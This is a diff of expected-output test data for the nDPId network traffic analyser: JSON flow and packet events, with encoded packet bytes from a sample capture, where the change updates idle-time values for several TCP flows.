00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1171,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1470104416855,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104416855,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J2UAAAERi4vAqGUh4AAA\/PVmFOsAI\/xOWbQAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} 00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1171,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} @@ -472,10 +472,10 @@ 00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":2,"flow_last_seen":1470104416958,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104416958,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J2cAAAERi4nAqGUh4AAA\/PVmFOsAI\/xOWbQAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1174,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":2,"flow_last_seen":1470104416959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104416959,"pkt":"AQBeAAD8cPGh+Cr9CABFAAA3CxIAAAERB\/fAqAUJ4AAA\/PVmFOsAI1xnWbQAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1200,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104419061,"flow_last_seen":1470104419061,"flow_idle_time":7440000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":101,"midstream":1,"thread_ts_msec":1470104419061,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1470104419061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1470104419061,"pkt":"ABxCjnAxTF4M6gNlCABFAACZI1ZAAFgGw0IfDVcBwKgFEAG70UpuASLeX6ylxYAYAJ4ivgAAAQEICp0wiHcaDujhFwMDAGCI1MTiGjgHtvACFdJlLWU4Nw2FMu4PdWcz\/2qZKGCdERXjWW+\/VFKnsNQj6agVS5OakWCEMlC4HzCUNHzoAeDAfMWTlTRJFP0wq7r0D4aYTL9j7QTQTC0wsTFBdRQvfIs="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1470104419061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104419061,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0qwZAAEAGU\/fAqAUQHw1XAdFKAbtfrKXFbgEjQ4AQD\/zVtQAAAQEIChoPq9GdMIh3"} -02035{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1470104419103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1223,"pkt_l4_len":1189,"thread_ts_msec":1470104419103,"pkt":"TF4M6gNlYMVHBbyMCABFAAS5ltxAAEAGY5zAqAUQHw1XAdFKAbtfrKXFbgEjQ4AYEACgIgAAAQEIChoPq\/udMIh3FwMDBIB0Q7hbcg3gGVYTMrb0Tw1ukR9UWDAVBAtnbbvKcZJuPb4APoiSa8Bqy8MZbEZYSbOXsH6FRBiOXgQXR63aPZc\/hbpffrKKNOrKdGE28RcTBjPmf5KXRAiotID0urgwFwaynRtP+jd28hq9wG7na42EI3czkeebegJ7Hfqlh5eZl4Vnp3HXS2vj3pkfDjxrZNE1RoOaEkc+zGmnNTU0pYUiN9oTvOxyCvhMy7fmLDw2wNiIlnohv3qHV8HD46rBGW31Av40VD\/q5qbqM\/qLmRKpL9p4844aHi0K6ueq0ZT6TMs6WDgIPrhbY3XHMcMOatt\/ady86wYTLrgpENkDcutzNwuaAPbT+EcTuorA74M2F\/nruolPShszJ2UqNq\/Kb53\/C73zGS79aq0H4GQVpGLbiCEPEKZelcdnRDWAFlFD1De4jjpnV6eSGf0bsjdHkkSXOtKgo9fVDPltH7d4AfIVmOrYXnB4XaFQ7sqjoXmFP04T\/UZ9alTbXHhky07Nt8ZpZ+IsF6Mw7DMnQdlgdIAyTuc7JHD\/Ok90niXYhq4NzT+82L50EtJnB33J3Hke7h3o3sgTaNpQXdNfC2YJvtxEi753mIKXu+MBZEwy9ZPQaN73qXC\/OuiBukllab3YR64oWLHBb9R9Cob1usnX3xEd01XJDB4TsRXGV\/R4o29fk4M2bIFdhCdZZxbrlSOnlAJcyXFDgvxxi2r1OxtCdDnw2p7YYdruVdteggpuz3KWAxQf0xX6bEO4WvjFfVmqekT\/CcvxbftJ0OPvtUNbAmIMdzByrRWcH1KlE+Vp1L\/hC9R9Bs3ZcFYrVLmIjOjuR6dZM0gvCNqW+59Duv8pYvq5EskshSuV+VZXQgSphi1zRgwOIMQ80OXjfOd22IffY4fDrlfus1x+wyxpIvDhkq\/80yQo8lPgVUp5LrkwFv8MzfZEG9QVTX5NzJ4ld3sKhU430m+NFzViUapPGRtbxukso3sgavTRg8JkLGw0Wu4KmdOfCPycSYYMtX8wKXnZK3VItDYdup7QRof+kXjKmph54jb48oKmkP1E+fFyArD7x9lonAQ9p5aPKUKzZSnZg3s2QTvBrHxZHDUUh\/GiPymMFletcBA29rvJBTe5sh56A9o976AcTzrk2LtWjfifRRuCloaa709oX8j2NbS2T6fnPB7k5F2xcXniikiRI4m5Wr1rKwzBOYPeISDSO0Iag3\/qLAF4MYdHlpTmWSwUwPziE1P5k6JOH5aZI8e0Q7f0ZxLoqs1jZ2iVmphMqYY9PJIQOnlyUxXdzMxGkRPxC7nkXRnaVTa1Jic4cqbBA0o4E1jc9+EGwh1+8Xvom\/2X552fI1RWakGy58LTHqErwe5sAM83mOIz30W4kVNgLTYM0IjNdR3qa8WogmdKAZ3AFlzKnQVYuwcLo1Z88j+7WQ1aASRKMsinZvu7EijyrunTKJR37AcZ28FtpqOjfm2723l5Y4Ue3NHUMyl8JxA0FHtAmvTh7ijEjAuZW2F1kyMK9I8qLUk6J5HZwZruiDHIIjM="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1200,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104419061,"flow_last_seen":1470104419061,"flow_idle_time":7560000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":101,"midstream":1,"thread_ts_msec":1470104419061,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1470104419061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1470104419061,"pkt":"ABxCjnAxTF4M6gNlCABFAACZI1ZAAFgGw0IfDVcBwKgFEAG70UpuASLeX6ylxYAYAJ4ivgAAAQEICp0wiHcaDujhFwMDAGCI1MTiGjgHtvACFdJlLWU4Nw2FMu4PdWcz\/2qZKGCdERXjWW+\/VFKnsNQj6agVS5OakWCEMlC4HzCUNHzoAeDAfMWTlTRJFP0wq7r0D4aYTL9j7QTQTC0wsTFBdRQvfIs="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1470104419061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104419061,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0qwZAAEAGU\/fAqAUQHw1XAdFKAbtfrKXFbgEjQ4AQD\/zVtQAAAQEIChoPq9GdMIh3"} +02035{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1470104419103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1223,"pkt_l4_len":1189,"thread_ts_msec":1470104419103,"pkt":"TF4M6gNlYMVHBbyMCABFAAS5ltxAAEAGY5zAqAUQHw1XAdFKAbtfrKXFbgEjQ4AYEACgIgAAAQEIChoPq\/udMIh3FwMDBIB0Q7hbcg3gGVYTMrb0Tw1ukR9UWDAVBAtnbbvKcZJuPb4APoiSa8Bqy8MZbEZYSbOXsH6FRBiOXgQXR63aPZc\/hbpffrKKNOrKdGE28RcTBjPmf5KXRAiotID0urgwFwaynRtP+jd28hq9wG7na42EI3czkeebegJ7Hfqlh5eZl4Vnp3HXS2vj3pkfDjxrZNE1RoOaEkc+zGmnNTU0pYUiN9oTvOxyCvhMy7fmLDw2wNiIlnohv3qHV8HD46rBGW31Av40VD\/q5qbqM\/qLmRKpL9p4844aHi0K6ueq0ZT6TMs6WDgIPrhbY3XHMcMOatt\/ady86wYTLrgpENkDcutzNwuaAPbT+EcTuorA74M2F\/nruolPShszJ2UqNq\/Kb53\/C73zGS79aq0H4GQVpGLbiCEPEKZelcdnRDWAFlFD1De4jjpnV6eSGf0bsjdHkkSXOtKgo9fVDPltH7d4AfIVmOrYXnB4XaFQ7sqjoXmFP04T\/UZ9alTbXHhky07Nt8ZpZ+IsF6Mw7DMnQdlgdIAyTuc7JHD\/Ok90niXYhq4NzT+82L50EtJnB33J3Hke7h3o3sgTaNpQXdNfC2YJvtxEi753mIKXu+MBZEwy9ZPQaN73qXC\/OuiBukllab3YR64oWLHBb9R9Cob1usnX3xEd01XJDB4TsRXGV\/R4o29fk4M2bIFdhCdZZxbrlSOnlAJcyXFDgvxxi2r1OxtCdDnw2p7YYdruVdteggpuz3KWAxQf0xX6bEO4WvjFfVmqekT\/CcvxbftJ0OPvtUNbAmIMdzByrRWcH1KlE+Vp1L\/hC9R9Bs3ZcFYrVLmIjOjuR6dZM0gvCNqW+59Duv8pYvq5EskshSuV+VZXQgSphi1zRgwOIMQ80OXjfOd22IffY4fDrlfus1x+wyxpIvDhkq\/80yQo8lPgVUp5LrkwFv8MzfZEG9QVTX5NzJ4ld3sKhU430m+NFzViUapPGRtbxukso3sgavTRg8JkLGw0Wu4KmdOfCPycSYYMtX8wKXnZK3VItDYdup7QRof+kXjKmph54jb48oKmkP1E+fFyArD7x9lonAQ9p5aPKUKzZSnZg3s2QTvBrHxZHDUUh\/GiPymMFletcBA29rvJBTe5sh56A9o976AcTzrk2LtWjfifRRuCloaa709oX8j2NbS2T6fnPB7k5F2xcXniikiRI4m5Wr1rKwzBOYPeISDSO0Iag3\/qLAF4MYdHlpTmWSwUwPziE1P5k6JOH5aZI8e0Q7f0ZxLoqs1jZ2iVmphMqYY9PJIQOnlyUxXdzMxGkRPxC7nkXRnaVTa1Jic4cqbBA0o4E1jc9+EGwh1+8Xvom\/2X552fI1RWakGy58LTHqErwe5sAM83mOIz30W4kVNgLTYM0IjNdR3qa8WogmdKAZ3AFlzKnQVYuwcLo1Z88j+7WQ1aASRKMsinZvu7EijyrunTKJR37AcZ28FtpqOjfm2723l5Y4Ue3NHUMyl8JxA0FHtAmvTh7ijEjAuZW2F1kyMK9I8qLUk6J5HZwZruiDHIIjM="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1231,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420438,"flow_last_seen":1470104420438,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1470104420438,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1470104420438,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":87,"pkt_l4_len":33,"thread_ts_msec":1470104420438,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACERAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD7vQU6wAh24kTvAAAAAEAAAAAAAAHc29udXNhdgAAAQAB"} 00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1231,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420438,"flow_last_seen":1470104420438,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1470104420438,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} @@ -488,18 +488,18 @@ 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423202,"flow_last_seen":1470104423202,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104423202,"l3_proto":"ip6","src_ip":"fe80::f65c:89ff:fe89:e607","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1470104423202,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104423202,"pkt":"MzMAAQAC9FyJieYHht1gD8\/5ACwRAf6AAAAAAAAA9lyJ\/\/6J5gf\/AgAAAAAAAAAAAAAAAQACAiICIwAsGIELuXYqAAEADgABAAEeo3uS9FyJieYHAAYABAAXABgACAAC\/\/8="} 00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423202,"flow_last_seen":1470104423202,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104423202,"l3_proto":"ip6","src_ip":"fe80::f65c:89ff:fe89:e607","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423246,"flow_last_seen":1470104423246,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104423246,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1470104423246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104423246,"pkt":"ABAj4ACgYMVHBbyMCABFAABAVdFAAEAG6zrAqAUQwKhzS9F9AbtloPklAAAAALAC\/\/81IwAAAgQFtAEDAwUBAQgKGg+8HwAAAAAEAgAA"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1470104423247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104423247,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70X2C0DtLZaD5JoASFtBuaQAAAgQFtAEBBAIBAwMH"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":3,"flow_last_seen":1470104423247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104423247,"pkt":"ABAj4ACgYMVHBbyMCABFAAAoVNRAAEAG7E\/AqAUQwKhzS9F9AbtloPkmgtA7TFAQIACmCwAAUC8xLjEN"} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104423246,"flow_last_seen":1470104423248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1470104423248,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1276,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104423246,"flow_last_seen":1470104423251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1470104423251,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423246,"flow_last_seen":1470104423246,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104423246,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1470104423246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104423246,"pkt":"ABAj4ACgYMVHBbyMCABFAABAVdFAAEAG6zrAqAUQwKhzS9F9AbtloPklAAAAALAC\/\/81IwAAAgQFtAEDAwUBAQgKGg+8HwAAAAAEAgAA"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1470104423247,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104423247,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70X2C0DtLZaD5JoASFtBuaQAAAgQFtAEBBAIBAwMH"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":3,"flow_last_seen":1470104423247,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104423247,"pkt":"ABAj4ACgYMVHBbyMCABFAAAoVNRAAEAG7E\/AqAUQwKhzS9F9AbtloPkmgtA7TFAQIACmCwAAUC8xLjEN"} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104423246,"flow_last_seen":1470104423248,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1470104423248,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1276,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104423246,"flow_last_seen":1470104423251,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1470104423251,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1318,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104424738,"flow_last_seen":1470104424738,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104424738,"l3_proto":"ip4","src_ip":"192.168.0.104","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1470104424738,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104424738,"pkt":"\/\/\/\/\/\/\/\/AAwpjO\/4CABFAABOZ6MAAIARUUPAqABowKj\/\/wCJAIkAOgIy8PkBEAABAAAAAAAAIEZERURDT0VCRkNGQ0VCRU9FREVCRkNDT0VQRkNFSEFBAAAgAAE="} 